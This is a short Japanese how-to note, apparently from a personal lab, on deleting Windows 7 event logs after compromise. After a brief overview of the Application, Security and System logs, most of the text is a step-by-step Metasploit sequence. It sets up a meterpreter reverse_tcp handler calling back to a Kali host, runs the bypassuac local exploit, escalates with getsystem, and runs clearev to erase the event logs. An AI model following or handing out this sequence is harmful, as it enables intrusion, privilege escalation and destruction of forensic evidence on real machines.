Windows7 ログ削除
Windows システムログは
イベントログとして記録され
これは
イベントビューアで確認できる
WIndows で確認するには
スタートメニューで
eventvwr.msc
とすれば
Event Viewwer が起動しログの確認ができる
主なイベントログは
Application
アプリやプログラムが記録する情報
エラーなどが該当
Security
Windows 椅子sテムが記録する情報
特定ファイルの読み取り失敗とか
ログオンの成否などなど
System
標準サービスの記録情報
デバイスドライバ
OSブートなどなど
これらを削除するには
KaliLinux 側で SYSTEM権限で
clearev コマンドを使うことで削除が可能になる
すでにバックドア設置済みな場合
msfconsole
で
Metaploit を起動
msf コンソールが起動したら
use exploit/multi/handler
でハンドラーモジュールを使用
set payload windows/meterpreter/reverse_tcp
でペイロードをセット
set LHOST 192.168.1.134
で KaliLInux のIPアドレスを設定
これで
exploit
でペイロードが実行され、待受状態になってから
50秒後にセッションが接続される
ただし、この状態ではSYSTEM権限ではないし
そのままでは権限昇格もできない
次に
background
というように
background コマンドを使い
Meterpreter セッションをバックグラウンドにして
msf プロンプトにする
次にUAC機能をバイパスするモジュールを使う
これは確率済みセッションを通して Exploit を送る
use exploit/windows/local/bypassuac
で使用するペイロードをセット
次に
set SESSION 1
でセッションをセット
そして再度 reverse_tcp を設定
set payload windows/meterpreter/reverse_tcp
でペイロードをセット
set LHOST 192.168.1.134
で KaliLInux のIPアドレスを設定
これで
exploit
でUAC機能をバイパスした状態で実行できる
次に権限昇格
getsystem -t 1
これでユーザ権限を確認するとSYSTEM権限になっているのがわかる
getuid
これで権限を得たので
clearev
を実行するとイベントログが消去される
